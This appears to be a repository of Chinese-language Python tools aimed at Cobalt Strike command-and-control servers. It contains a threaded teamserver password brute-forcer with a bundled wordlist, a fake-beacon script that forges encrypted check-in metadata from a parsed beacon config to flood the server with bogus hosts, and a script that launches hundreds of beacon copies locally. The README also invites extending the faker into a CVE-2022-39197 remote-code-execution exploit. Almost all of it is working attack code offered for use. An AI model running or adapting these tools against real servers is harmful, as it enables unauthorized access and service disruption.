├── .gitignore ├── README.md ├── csDDos.py ├── csFakeShell.py ├── csIntruder.py ├── dic ├── computer_name_dic.txt ├── password.txt ├── process_name_dic.txt └── user_name_dic.txt ├── img ├── 1.png ├── 2.png ├── 3.png ├── 33.png └── 4.png └── tool ├── DumpKeys.java ├── beacon_utils.py └── parse_beacon_config.py /.gitignore: -------------------------------------------------------------------------------- 1 | /.idea/ 2 | /.DS_Store -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 0x01 概述 2 | 3 | - 本项目包含**CobaltStrike密码爆破**、**伪造上线**以及**DDos**功能。其中伪造上线**支持常见魔改版CS**。 4 | 5 | ![image](/img/33.png) 6 | 7 | - This project includes **CobaltStrike password blasting**, **fake online** and **DDos** functions. Among them, fake online **supports common secondary development version CS**. 8 | 9 | # 0x02 环境准备 10 | 11 | pip3 install netstruct 12 | 13 | pip3 install pefile 14 | 15 | # 0x03 文件说明 16 | 17 | - 1、**csIntruder.py** 18 | ``` 19 | cs密码爆破 20 | ``` 21 | - 2、**csFakeShell.py** 22 | - 可二开至**CVE-2022-39197**进行**RCE**，我懒，懂得都懂，坐等pull request 23 | ``` 24 | cs伪造上线骚扰 25 | ``` 26 | 27 | - 3、**csDDos.py** 28 | ``` 29 | cs多线程本地(隔离机)上线Dos骚扰 30 | ``` 31 | 32 | # 0x04 csIntruder.py-cs密码爆破 33 | 34 | - 1、参数： 35 | 36 | | Parameter | Note | Required | 37 | | :----: | :----: | :----: | 38 | | -o | CS服务端地址 | True | 39 | | -p | CS服务端端口(default:50050) | False | 40 | | -r | 密码字典文件路径 | True | 41 | | -t | 线程数(default:默认30) | False | 42 | 43 | - 2、使用： 44 | 45 | ![image](/img/2.png) 46 | 47 | # 0x05 csFakeShell.py-cs伪造上线骚扰 48 | 49 | 支持原版CS以及常见魔改版CS的上线伪造 50 | 51 | - 1、参数： 52 | 53 | | Parameter | Note | Required | 54 | | :----: | :----: | :----: | 55 | | -f | CsBeacon木马文件路径/CsBeaconUrl【支持URL哦】 | True | 56 | | -n | 上线虚假主机个数 | True | 57 | | -c | 电脑名字典路径【默认自带字典】 | False | 58 | | -u | 用户名字典路径【默认自带字典】 | False | 59 | | -p | 线程名字典路径【默认自带字典】 | False | 60 | 61 | - 2、使用： 62 | 63 | ![image](/img/3.png) 64 | 65 | ![image](/img/1.png) 66 | 67 | ![image](/img/33.png) 68 | 69 | ### csFackShell.py二开/添加其他魔改请求注意： 70 | 71 | - ① DumpKeys.java用于解密通信信息，需要cs服务端密钥 72 | 73 | - ② 使用命令：java -cp "cobaltstrike.jar" DumpKeys.java 74 | 75 | - ③ 在线RSA加解密：https://the-x.cn/cryptography/Rsa.aspx 76 | 77 | # 0x06 csDDos.py-cs多线程本地(隔离机)上线Dos骚扰 78 | 79 | - 1、参数： 80 | 81 | | Parameter | Note | Required | 82 | | :----: | :----: | :----: | 83 | | -f | CS木马文件路径/执行命令 | True | 84 | | -t | 线程数(default:300) | False | 85 | 86 | - 2、使用： 87 | 88 | ![image](/img/4.png) 89 | 90 | -------------------------------------------------------------------------------- /csDDos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import argparse 3 | import subprocess 4 | import threading 5 | 6 | def run_exe(file): 7 | # 若执行失败，请删除【stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL】输出/错误输出重定向，查看报错分析 8 | subprocess.Popen(file, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, executable='/bin/bash') 9 | 10 | def local_run(file, thread_num): 11 | confirm = input('\n\033[31m[-] 你将使用的本地运行CS木马，请确保环境隔离，莫送人头，是否继续: (Y/N): \033[0m \n\033[33m$ \033[0m').lower() 12 | if not confirm.startswith('y'): 13 | print(f"\033[31m[x] 输入选择非Y，退出该程序\033[0m") 14 | return 15 | 16 | threads = [] 17 | print(f"\033[32m[o] 正在本地初始化线程，线程数{str(thread_num)}条,请稍后……\033[0m") 18 | 19 | try: 20 | for thread in range(thread_num): 21 | t = threading.Thread(target=run_exe, args=(file,)) 22 | t.start() 23 | threads.append(t) 24 | for t in threads: 25 | t.join() 26 | except Exception as e: 27 | print(f"\033[31m[x] Error:{str(e)}\033[0m") 28 | return 29 | 30 | print(f"\033[32m[o] 本地DDOS成功，当前CS木马线程数已启动{str(thread_num)}条\033[0m") 31 | 32 | def main(): 33 | parser = argparse.ArgumentParser(description="DDoS tool for CS.") 34 | parser.add_argument("-f", "--file", dest="filename", type=str, required=True, help="CS木马文件路径/执行命令") 35 | parser.add_argument("-t", "--threads", dest="thread_num", default=300, type=int, help="线程数，默认300") 36 | args = parser.parse_args() 37 | file = args.filename 38 | thread_num = args.thread_num 39 | 40 | local_run(file, thread_num) 41 | 42 | if __name__ == "__main__": 43 | main() -------------------------------------------------------------------------------- /csFakeShell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import re 3 | import platform 4 | from tool.parse_beacon_config import * 5 | import base64 6 | import random 7 | import rsa 8 | import requests 9 | import multiprocessing 10 | 11 | # 未经魔改CS版本假上线 12 | # IP整数bytearray再反转 13 | def goOnline_1(url, computer_name, user_name, process_name, pubkey, UserAgent): 14 | # 随机数作为AES Key 15 | aes_key = bytearray(random.getrandbits(4) for _ in range(16)) 16 | # 将 AESKEY 添加到 pack 中 17 | pack = aes_key 18 | # 添加其他数据 19 | pack += b'\xa8\x03' # name charset (int) (little) 20 | pack += b'\xa8\x03' # name charset (int) (little) 21 | pack += random.randint(0, 9999999).to_bytes(4, 'big') # Beacon Id 22 | pack += random.randint(0, 65535).to_bytes(4, 'big') # Beacon Pid 23 | pack += b'\x00\x00' # Beacon Port 24 | pack += b'\x04' # Beacon Flag 04 25 | pack += b'\x06' 26 | pack += b'\x02' 27 | pack += b'\x23\xf0\x00\x00\x00\x00' # windows version (int) 28 | pack += b'\x76\x91' # windows version_1 (int) 29 | pack += b'\x0a\x60\x76\x90\xf5\x50' 30 | 31 | fistList = ['172','192','10'] 32 | randomIndex = random.randint(0,2) 33 | if fistList[randomIndex] == "172": 34 | tempIpData= '172.' + str(random.randint(16,24)) + '.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) 35 | if fistList[randomIndex] == "192": 36 | tempIpData= '192.168.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) 37 | if fistList[randomIndex] == "10": 38 | tempIpData= '10.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) 39 | pack += bytearray([int(i) for i in tempIpData.split('.')[::-1]]) 40 | 41 | # 将计算机名、用户名、进程名添加到 pack 中 42 | computer_name_bytes = bytes(computer_name.encode('utf-8')) + b'\x09' 43 | user_name_bytes = bytes(user_name.encode('utf-8')) + b'\x09' 44 | process_name_bytes = bytes(process_name.encode('utf-8')) 45 | pack += computer_name_bytes + user_name_bytes + process_name_bytes 46 | # 添加 pack 的长度和其他头信息 47 | pack = b'\x00\x00\xBE\xEF' + len(pack).to_bytes(4, 'big') + pack 48 | # 使用公钥加密 pack，并使用 base64 编码 49 | pem_prefix = '-----BEGIN PUBLIC KEY-----\n' 50 | pem_suffix = '\n-----END PUBLIC KEY-----' 51 | key = '{}{}{}'.format(pem_prefix,pubkey,pem_suffix) 52 | pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(key) 53 | try: 54 | enpack = rsa.encrypt(pack, pubkey) 55 | enpack_b64 = base64.b64encode(enpack).decode('utf-8') 56 | # 构造请求头，并发送 POST 请求 57 | headers = { 58 | 'User-Agent':UserAgent, 59 | 'Cookie': enpack_b64, 60 | 'Accept': '*/*', 61 | 'Connection': 'Keep-Alive', 62 | 'Cache-Control': 'no-cache' 63 | } 64 | req = requests.get(url, headers=headers) 65 | if req.status_code == 200: 66 | print(f"\033[32m[o] IP:[{tempIpData+' '*(15-len(tempIpData))}]，主机名:[{computer_name+' '*(15-len(computer_name))}]，用户名:[{user_name+' '*(10-len(user_name))}], 进程名:[{process_name+' '*(13-len(process_name))}] 已上线\033[0m") 67 | else: 68 | print(f"\033[31m[x] Error-Code : {req.status_code}\033[0m") 69 | print(f"\033[31m[x] Error-headers: {req.headers}\033[0m") 70 | print(f"\033[31m[x] Error-text : {req.text if req.text else 'NULL'}\033[0m") 71 | except Exception as e: 72 | if( "but there is only space for 117" in str(e)): 73 | print(f"\033[31m[x] Error: 加密字段过长，加密失败，请检查传入变量字段长度") 74 | else: 75 | print(f"\033[31m[x] Error: {str(e)}") 76 | 77 | # 常见魔改CS版本假上线 78 | def goOnline_2(url, computer_name, user_name, process_name, pubkey, UserAgent): 79 | # 随机数作为AES Key 80 | aes_key = bytearray(random.getrandbits(4) for _ in range(16)) 81 | # 将 AESKEY 添加到 pack 中 82 | pack = aes_key 83 | # 添加其他数据 84 | pack += b'\xa8\x03' # name charset (int) (little) 85 | pack += b'\xa8\x03' # name charset (int) (little) 86 | pack += random.randint(0, 9999999).to_bytes(4, 'big') # Beacon Id 87 | pack += random.randint(0, 65535).to_bytes(4, 'big') # Beacon Pid 88 | pack += b'\x00\x00' # Beacon Port 89 | pack += b'\x0e\x36\x32\x09' 90 | fistList = ['172','192','10'] 91 | randomIndex = random.randint(0,2) 92 | if fistList[randomIndex] == "172": 93 | tempIpData= fistList[randomIndex] + '.' + str(random.randint(16,24)) + '.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) 94 | if fistList[randomIndex] == "192": 95 | tempIpData= fistList[randomIndex] + '.168.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) 96 | if fistList[randomIndex] == "10": 97 | tempIpData= fistList[randomIndex] + '.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) + '.' + str(random.randint(0,255)) 98 | pack += bytearray(tempIpData.encode('utf-8')) 99 | pack += b"\x09" 100 | 101 | # 将计算机名、用户名、进程名添加到 pack 中 102 | computer_name_bytes = bytes(computer_name.encode('utf-8')) + b'\x09' 103 | user_name_bytes = bytes(user_name.encode('utf-8')) + b'\x09' 104 | process_name_bytes = bytes(process_name.encode('utf-8')) 105 | pack += computer_name_bytes + user_name_bytes + process_name_bytes 106 | # 添加 pack 的长度和其他头信息 107 | pack = b'\x00\x00\xBE\xEF' + len(pack).to_bytes(4, 'big') + pack 108 | # 使用公钥加密 pack，并使用 base64 编码 109 | pem_prefix = '-----BEGIN PUBLIC KEY-----\n' 110 | pem_suffix = '\n-----END PUBLIC KEY-----' 111 | key = '{}{}{}'.format(pem_prefix,pubkey,pem_suffix) 112 | pubkey = rsa.PublicKey.load_pkcs1_openssl_pem(key) 113 | try: 114 | enpack = rsa.encrypt(pack, pubkey) 115 | enpack_b64 = base64.b64encode(enpack).decode('utf-8') 116 | # 构造请求头，并发送 POST 请求 117 | headers = { 118 | 'User-Agent':UserAgent, 119 | 'Cookie': 'SESSIONID='+enpack_b64, 120 | 'Accept': '*/*', 121 | 'Connection': 'Keep-Alive', 122 | 'Cache-Control': 'no-cache' 123 | } 124 | req = requests.get(url, headers=headers) 125 | if req.status_code == 200: 126 | print(f"\033[32m[o] IP:[{tempIpData+' '*(15-len(tempIpData))}]，主机名:[{computer_name+' '*(15-len(computer_name))}]，用户名:[{user_name+' '*(10-len(user_name))}], 进程名:[{process_name+' '*(13-len(process_name))}] 已上线\033[0m") 127 | else: 128 | print(f"\033[31m[x] Error-Code : {req.status_code}\033[0m") 129 | print(f"\033[31m[x] Error-headers: {req.headers}\033[0m") 130 | print(f"\033[31m[x] Error-text : {req.text if req.text else 'NULL'}\033[0m") 131 | except Exception as e: 132 | if( "but there is only space for 117" in str(e)): 133 | print(f"\033[31m[x] Error: 加密字段过长，加密失败，请检查传入变量字段长度") 134 | else: 135 | print(f"\033[31m[x] Error: {str(e)}") 136 | 137 | def initData(): 138 | parser = argparse.ArgumentParser(description="fake online information for CS.") 139 | parser.add_argument("-f", "--file", dest="filename", type=str, required=True, help="CsBeacon木马文件路径/CsBeaconUrl【支持URL哦】") 140 | parser.add_argument("-n", "--number", dest="number", type=int, required=True, help="上线虚假主机个数") 141 | parser.add_argument("-c", "--computer", dest="computer_name_dic", type=str, default="./dic/computer_name_dic.txt", help="电脑名字典路径【默认自带字典】") 142 | parser.add_argument("-u", "--user", dest="user_name_dic", type=str, default="./dic/user_name_dic.txt", help="用户名字典路径【默认自带字典】") 143 | parser.add_argument("-p", "--process", dest="process_name_dic", type=str, default="./dic/process_name_dic.txt", help="线程名字典路径【默认自带字典】") 144 | args = parser.parse_args() 145 | return args.filename, args.number, args.computer_name_dic, args.user_name_dic, args.process_name_dic 146 | 147 | def main(): 148 | beaconFileOrUrl, number, computer_name_dic, user_name_dic, process_name_dic = initData() 149 | 150 | csBeacon=json.loads(json.dumps(csBeaconParse( beaconFileOrUrl ,True,False,0), cls=Base64Encoder)) 151 | print(f"\033[32m[o] ---------------解析beacon设置信息---------------\033[0m\n{csBeacon}\n") 152 | 153 | # 提取基本数据进行拼接 154 | BeaconType = 'https://' if csBeacon['BeaconType'][0]=='HTTPS' else 'http://' 155 | UserAgent = csBeacon['UserAgent'] 156 | Port = csBeacon['Port'] 157 | C2Server = csBeacon['C2Server'] 158 | HttpPostUri = csBeacon['HttpPostUri'] 159 | url = BeaconType + C2Server.replace(',',f':{Port}')# + HttpPostUri 160 | 161 | Metadata = csBeacon['HttpGet_Metadata']['Metadata'] 162 | 163 | # 数据格式化，并打印 164 | regex = re.compile(r"A+==") 165 | PublicKey = regex.sub('',csBeacon["PublicKey"]) 166 | PublicKey = PublicKey if len(PublicKey)%4==0 else PublicKey+"A==" if len(PublicKey)%4==1 else PublicKey+"==" if len(PublicKey)%4==2 else PublicKey+"=" 167 | print(f"\033[32m[o] ------------------提取格式化数据------------------") 168 | print(f"\033[32m[o] 【PublicKey】:\033[0m {PublicKey}") 169 | print(f"\033[32m[o] 【 Url 】:\033[0m {url}") 170 | print(f"\033[32m[o] 【UserAgent】:\033[0m {UserAgent}") 171 | print(f"\033[32m[o] --------------------------------------------------\n") 172 | 173 | multiprocessing.set_start_method('fork') if "macos" in platform.platform().lower() else NULL 174 | 175 | for _ in range(number): 176 | computer_name = random.choice(list(open(computer_name_dic))).strip() 177 | user_name = random.choice(list(open(user_name_dic))).strip() 178 | process_name = random.choice(list(open(process_name_dic))).strip() 179 | if 'SESSIONID=' not in str(Metadata): # 魔改CS特征 180 | t = multiprocessing.Process(target=goOnline_1(url, computer_name, user_name, process_name,PublicKey,UserAgent)) 181 | else: 182 | t = multiprocessing.Process(target=goOnline_2(url, computer_name, user_name, process_name,PublicKey,UserAgent)) 183 | t.start() 184 | 185 | if __name__ == "__main__": 186 | main() -------------------------------------------------------------------------------- /csIntruder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import argparse 3 | import concurrent.futures as futures 4 | import socket 5 | import ssl 6 | import sys 7 | import os 8 | import threading 9 | from urllib.parse import urlparse 10 | from functools import partial 11 | 12 | # 全局终止标志 13 | stop_flag = threading.Event() 14 | 15 | parser = argparse.ArgumentParser(description="Guess password for CS.") 16 | parser.add_argument("-o", "--host", dest="host", type=str, help="CS服务端地址",required=True) 17 | parser.add_argument("-p", "--port", dest="port", type=int, help="CS服务端端口",default=50050) 18 | parser.add_argument("-r", "--password", dest="passwordList", type=str, help="密码字典文件路径",required=True) 19 | parser.add_argument("-t", "--threads", dest="threads", type=int, help="线程数，默认根据cpu数*4",default=min(32, (os.cpu_count() or 1) * 4)) 20 | parser.add_argument("-proxy", "--proxy", dest="proxy", type=str, help="代理设置，例如socks5://127.0.0.1:1080") 21 | args = parser.parse_args() 22 | 23 | host = args.host 24 | port = args.port 25 | passwordList = args.passwordList 26 | threadsNum = args.threads 27 | proxy_config = None 28 | 29 | # 解析代理配置 30 | if args.proxy: 31 | try: 32 | import socks 33 | except ImportError: 34 | print("\033[31m[x] 使用代理需要安装PySocks库，请执行 pip install PySocks \033[0m") 35 | sys.exit(1) 36 | 37 | proxy_url = urlparse(args.proxy) 38 | proxy_scheme = proxy_url.scheme.lower() 39 | proxy_type_str = proxy_scheme if proxy_scheme else 'socks5' 40 | proxy_host = proxy_url.hostname 41 | proxy_port = proxy_url.port 42 | 43 | if not proxy_host or not proxy_port: 44 | print("\033[31m[x] 代理地址格式错误，应为协议://主机:端口 \033[0m") 45 | sys.exit(1) 46 | 47 | proxy_types = { 48 | 'socks4': socks.PROXY_TYPE_SOCKS4, 49 | 'socks5': socks.PROXY_TYPE_SOCKS5, 50 | 'http': socks.PROXY_TYPE_HTTP 51 | } 52 | if proxy_type_str not in proxy_types: 53 | print(f"\033[31m[x] 不支持的代理类型: {proxy_type_str} ,请使用socks4/socks5/http \033[0m") 54 | sys.exit(1) 55 | 56 | proxy_config = { 57 | 'type': proxy_types[proxy_type_str], 58 | 'host': proxy_host, 59 | 'port': proxy_port 60 | } 61 | 62 | class NotConnectedException(Exception): 63 | def __init__(self, message=None, node=None): 64 | self.message = message 65 | self.node = node 66 | 67 | 68 | class DisconnectedException(Exception): 69 | def __init__(self, message=None, node=None): 70 | self.message = message 71 | self.node = node 72 | 73 | 74 | class Connector: 75 | def __init__(self): 76 | global proxy_config 77 | self.proxy_config = proxy_config 78 | self.sock = None 79 | self.ssl_sock = None 80 | self.ctx = ssl.SSLContext() 81 | self.ctx.verify_mode = ssl.CERT_NONE 82 | 83 | def is_connected(self): 84 | return self.sock and self.ssl_sock 85 | 86 | def connect(self, hostname, port): 87 | if stop_flag.is_set(): # 检查终止标志 88 | raise DisconnectedException("Connection aborted by stop flag") 89 | 90 | # 创建代理socket或普通socket 91 | if self.proxy_config: 92 | import socks 93 | self.sock = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM) 94 | self.sock.set_proxy(proxy_type=self.proxy_config['type'],addr=self.proxy_config['host'],port=self.proxy_config['port']) 95 | else: 96 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 97 | 98 | self.sock.settimeout(20) # 一般10 99 | self.ssl_sock = self.ctx.wrap_socket(self.sock) 100 | 101 | try: 102 | # 该代码不适用代理，存在代理服务绕过问题 103 | # if hostname == socket.gethostname(): 104 | # ipaddress = socket.gethostbyname_ex(hostname)[2][0] 105 | # self.ssl_sock.connect((ipaddress, port)) 106 | # else: 107 | # self.ssl_sock.connect((hostname, port)) 108 | self.ssl_sock.connect((hostname, port)) 109 | except (socket.error, ssl.SSLError) as e: 110 | self.close() 111 | raise NotConnectedException(str(e)) 112 | 113 | def close(self): 114 | if self.sock: 115 | self.sock.close() 116 | self.sock = None 117 | self.ssl_sock = None 118 | 119 | def send(self, buffer): 120 | if not self.is_connected() or stop_flag.is_set(): 121 | raise DisconnectedException() 122 | self.ssl_sock.sendall(buffer) 123 | 124 | def receive(self): 125 | if not self.is_connected() or stop_flag.is_set(): 126 | raise DisconnectedException() 127 | 128 | received_size = 0 129 | data_buffer = b"" 130 | 131 | while received_size < 4 and not stop_flag.is_set(): 132 | try: 133 | data_in = self.ssl_sock.recv() 134 | if not data_in: # 连接被关闭 135 | raise DisconnectedException() 136 | data_buffer = data_buffer + data_in 137 | received_size += len(data_in) 138 | except (socket.timeout, ssl.SSLError): 139 | break 140 | return data_buffer 141 | 142 | def __enter__(self): 143 | return self 144 | 145 | def __exit__(self, exc_type, exc_value, traceback): 146 | self.close() 147 | 148 | def passwordcheck(password): 149 | if stop_flag.is_set() or not password: # 提前终止检查 150 | return None 151 | if len(password) == 0: 152 | return False 153 | 154 | try: 155 | with Connector() as conn: 156 | conn.connect(args.host, args.port) 157 | 158 | payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes( 159 | bytes(password, "ascii").ljust(256, b"A")) 160 | conn.send(payload) 161 | 162 | result = conn.receive() 163 | if result == bytearray(b"\x00\x00\xca\xfe"): 164 | return password 165 | else: 166 | return "It's Not "+password 167 | except Exception as e: 168 | return f"Error: {str(e)}" 169 | 170 | def main(): 171 | # 读取密码字典 172 | try: 173 | with open(passwordList, "r") as f: 174 | passwords = [p.strip() for p in f.read().split("\n") if p.strip()] 175 | except FileNotFoundError: 176 | print(f"\033[31m[x] 错误: 密码文件 {passwordList} 不存在 \033[0m") 177 | return 178 | 179 | if not passwords: 180 | print("\033[31m[x] 错误: 密码字典为空 \033[0m") 181 | return 182 | 183 | 184 | # 线程池管理 185 | with futures.ThreadPoolExecutor(max_workers=threadsNum) as executor: 186 | futures_dict = {executor.submit(passwordcheck, p): p for p in passwords} 187 | try: 188 | for future in futures.as_completed(futures_dict): 189 | if stop_flag.is_set(): 190 | break 191 | 192 | password = futures_dict[future] 193 | try: 194 | result = future.result() 195 | if result and "It's Not " not in result and "Error: " not in result: 196 | print(f"\n\033[32m[+] 爆破成功! 目标 [{host}:{port}] 的密码为: {result}\033[0m") 197 | stop_flag.set() # 设置终止标志 198 | break 199 | else: 200 | print(f"\033[31m[x] 尝试失败: {password} \033[0m", end="\r") 201 | except Exception as e: 202 | print(f"\033[33m[!] 异常: {password} -> {str(e)}\033[0m", end="\r") 203 | except KeyboardInterrupt: 204 | print("\n\033[33m[!] 用户中断操作，正在清理线程...\033[0m") 205 | stop_flag.set() 206 | finally: 207 | # 取消所有未完成任务 208 | for f in futures_dict: 209 | f.cancel() 210 | executor.shutdown(wait=False) 211 | os._exit(0) 212 | 213 | if __name__ == "__main__": 214 | main() -------------------------------------------------------------------------------- /dic/computer_name_dic.txt: -------------------------------------------------------------------------------- 1 | DESKTOP-H4F9WBN 2 | DESKTOP-R2Y7JMQ 3 | DESKTOP-P8L1CFK 4 | DESKTOP-N9J8XAK 5 | DESKTOP-G6H2LST 6 | DESKTOP-Z2N7QFT 7 | DESKTOP-M9T4GUC 8 | DESKTOP-D1L8BMR 9 | DESKTOP-F3M9KHS 10 | DESKTOP-S6V7RFP 11 | DESKTOP-Q8P3JGA 12 | DESKTOP-V9X7WNE 13 | DESKTOP-Y6K2LZV 14 | DESKTOP-C2N7QDL 15 | DESKTOP-K4B9HPF 16 | DESKTOP-X8H1GCE 17 | DESKTOP-L9T4JXO 18 | DESKTOP-W7G3RKP 19 | DESKTOP-Z4J6KAS 20 | DESKTOP-Q9B2VYR 21 | DESKTOP-U3J8KZA 22 | DESKTOP-F6P9XHL 23 | DESKTOP-R9T7GUK 24 | DESKTOP-M2D7FOT 25 | DESKTOP-C9H2LBJ 26 | DESKTOP-N6M8KPR 27 | DESKTOP-S4F1ZUD 28 | DESKTOP-J9D3XKP 29 | DESKTOP-K2P4ZNB 30 | DESKTOP-H7T9ZSE 31 | DESKTOP-V8L2JMF 32 | DESKTOP-G1B8HNT 33 | DESKTOP-Z9X3LFP 34 | DESKTOP-T7M1KRE 35 | DESKTOP-Q6C9HZP 36 | DESKTOP-Y7V8KIL 37 | DESKTOP-L3D7JMF 38 | DESKTOP-P6V9XZD 39 | DESKTOP-X2J7KIB 40 | DESKTOP-S9D8HVN 41 | DESKTOP-U2H4JBT 42 | DESKTOP-C7B9FJP 43 | DESKTOP-R4Z9XPU 44 | DESKTOP-N1D8KOT 45 | DESKTOP-W2C7GUP 46 | DESKTOP-K9X2JFC 47 | DESKTOP-M8C7HUL 48 | DESKTOP-F4P9ZXR 49 | DESKTOP-Z3C7JKN 50 | DESKTOP-J4F6HZS 51 | DESKTOP-T8P7KRY 52 | DESKTOP-H3B8JUO 53 | DESKTOP-X7V9HRE 54 | DESKTOP-L6D9XUP 55 | DESKTOP-Q1V2HBT 56 | DESKTOP-S8T1FJL 57 | DESKTOP-C6F7HZT 58 | DESKTOP-V2N9JUY 59 | DESKTOP-U7H9KDB 60 | DESKTOP-M6P8VZX 61 | DESKTOP-W4L7JTY 62 | DESKTOP-L8S4FPU 63 | DESKTOP-W4K8JRC 64 | DESKTOP-H9X2TNP 65 | DESKTOP-Y6B3KFR 66 | DESKTOP-F2T8ZJB 67 | DESKTOP-V9C2GNL 68 | DESKTOP-Q6F2UJV 69 | DESKTOP-B8N7FMT 70 | DESKTOP-Z1G8JWH 71 | DESKTOP-N7K2LXF 72 | DESKTOP-S2T9PJL 73 | DESKTOP-Q8S4FKD 74 | DESKTOP-B4M8YJH 75 | DESKTOP-G9K3HNT 76 | DESKTOP-T6N2FVJ 77 | DESKTOP-L9M4PHX 78 | DESKTOP-W8J7FYT 79 | DESKTOP-H2T6GNR 80 | DESKTOP-Y9X4KCP 81 | DESKTOP-F4S8ZJB 82 | DESKTOP-V8C4PNL 83 | DESKTOP-Q5F6UJV 84 | DESKTOP-B7N6FMT 85 | DESKTOP-Z3G6JWH 86 | DESKTOP-N8K7LXF 87 | DESKTOP-S5T6PJL 88 | DESKTOP-Q9S5FKD 89 | DESKTOP-B6M2YJH 90 | DESKTOP-G8K4HNT 91 | DESKTOP-T5N9FVJ 92 | DESKTOP-L4M3PHX 93 | DESKTOP-W9J8FYT 94 | DESKTOP-H6T2GNR 95 | DESKTOP-Y3X4KCP 96 | DESKTOP-F5S2ZJB 97 | DESKTOP-V6C5PNL 98 | DESKTOP-Q8F2UJV 99 | DESKTOP-B5N9FMT 100 | DESKTOP-Z2G5JWH 101 | DESKTOP-N9K1LXF 102 | DESKTOP-S6T2PJL 103 | DESKTOP-Q3S7FKD 104 | DESKTOP-B9M3YJH 105 | DESKTOP-G6K2HNT 106 | DESKTOP-T3N8FVJ 107 | DESKTOP-L7M9PHX 108 | DESKTOP-W2J6FYT 109 | DESKTOP-H5T9GNR 110 | DESKTOP-Y2X7KCP 111 | DESKTOP-F7S1ZJB 112 | DESKTOP-V4C9PNL 113 | DESKTOP-Q7F4UJV 114 | DESKTOP-B4N2FMT 115 | DESKTOP-Z9G8JWH 116 | DESKTOP-N6K7LXF 117 | DESKTOP-S9T4PJL 118 | DESKTOP-Q4S3FKD 119 | DESKTOP-B8M1YJH 120 | DESKTOP-G5K9HNT 121 | DESKTOP-T2N3FVJ 122 | DESKTOP-L9M7PHX 123 | DESKTOP-AS2RCRD 124 | DESKTOP-4B8V7ZJ 125 | DESKTOP-9A3F8WU 126 | DESKTOP-7N2L1FX 127 | DESKTOP-K6YJ9HX 128 | DESKTOP-Q6F2UJV 129 | DESKTOP-B8N7K6T 130 | DESKTOP-3D9V6AX 131 | DESKTOP-7R4N2FJ 132 | DESKTOP-L5J9G2X 133 | DESKTOP-F4W6H5S 134 | DESKTOP-8S5K7DN 135 | DESKTOP-M9N3C5Z 136 | DESKTOP-1R5L6XT 137 | DESKTOP-2Q4F5WD 138 | DESKTOP-6J8N4ZH 139 | DESKTOP-5S2C8VT 140 | DESKTOP-T9G7X1L 141 | DESKTOP-8F2H6KT 142 | DESKTOP-1G7N5KM 143 | DESKTOP-9J2C6HL 144 | DESKTOP-Q3K7V5P 145 | DESKTOP-6L9T2BX 146 | DESKTOP-2P7N8ZC 147 | DESKTOP-V6N3F8M 148 | DESKTOP-X9C7G5D 149 | DESKTOP-B5F2N6J 150 | DESKTOP-1W7H8KP 151 | DESKTOP-Y5D4J6H 152 | DESKTOP-4G5S9CF 153 | DESKTOP-T2R5J8K 154 | DESKTOP-3L7C5BV 155 | DESKTOP-9F4J5CN 156 | DESKTOP-M5J2H8S 157 | DESKTOP-7K4C9ZP 158 | DESKTOP-1G4L5FN 159 | DESKTOP-5H2S7VK 160 | DESKTOP-P9N3X5L 161 | DESKTOP-6R8J1GT 162 | DESKTOP-2F5H6KN 163 | DESKTOP-9B3K7VJ 164 | DESKTOP-C7T8L1N 165 | DESKTOP-L9C2X7F 166 | DESKTOP-S6D9N8J 167 | DESKTOP-4M5J7LP 168 | DESKTOP-K9L1T3N 169 | DESKTOP-3G6H8BN 170 | DESKTOP-2Q7L9FD 171 | DESKTOP-8H6T2JN 172 | DESKTOP-6W5H1PT 173 | DESKTOP-5J9K4LF 174 | DESKTOP-D4S5K6F 175 | DESKTOP-7P5D6BN 176 | DESKTOP-9V2N5LJ 177 | DESKTOP-Q4F8J7T 178 | DESKTOP-1N5H6XK 179 | DESKTOP-2C7T8LF 180 | DESKTOP-6L4N7JH 181 | DESKTOP-5S9J1FV 182 | DESKTOP-M1S8F2K 183 | DESKTOP-7L9C2XV -------------------------------------------------------------------------------- /dic/password.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | password 3 | 12345678 4 | 1234 5 | admin@123 6 | pussy 7 | 12345 8 | dragon 9 | qwerty 10 | 696969 11 | mustang 12 | letmein 13 | baseball 14 | qwe123456 15 | qwe123 16 | master 17 | michael 18 | football 19 | shadow 20 | monkey 21 | abc123 22 | pass 23 | fuckme 24 | 6969 25 | jordan 26 | harley 27 | ranger 28 | iwantu 29 | jennifer 30 | hunter 31 | fuck 32 | 2000 33 | test 34 | batman 35 | trustno1 36 | thomas 37 | tigger 38 | robert 39 | access 40 | love 41 | buster 42 | 1234567 43 | soccer 44 | hockey 45 | killer 46 | george 47 | sexy 48 | andrew 49 | charlie 50 | superman 51 | asshole 52 | fuckyou 53 | dallas 54 | jessica 55 | panties 56 | pepper 57 | 1111 58 | austin 59 | william 60 | daniel 61 | golfer 62 | summer 63 | heather 64 | hammer 65 | yankees 66 | joshua 67 | maggie 68 | biteme 69 | enter 70 | ashley 71 | thunder 72 | cowboy 73 | silver 74 | richard 75 | fucker 76 | orange 77 | merlin 78 | michelle 79 | corvette 80 | bigdog 81 | cheese 82 | matthew 83 | 121212 84 | patrick 85 | martin 86 | freedom 87 | ginger 88 | blowjob 89 | nicole 90 | sparky 91 | yellow 92 | camaro 93 | secret 94 | dick 95 | falcon 96 | taylor 97 | 111111 98 | 131313 99 | 123123 100 | bitch 101 | hello 102 | scooter 103 | please 104 | porsche 105 | guitar 106 | chelsea 107 | black 108 | diamond 109 | nascar 110 | jackson 111 | cameron 112 | 654321 113 | computer 114 | amanda 115 | wizard 116 | xxxxxxxx 117 | money 118 | phoenix 119 | mickey 120 | bailey 121 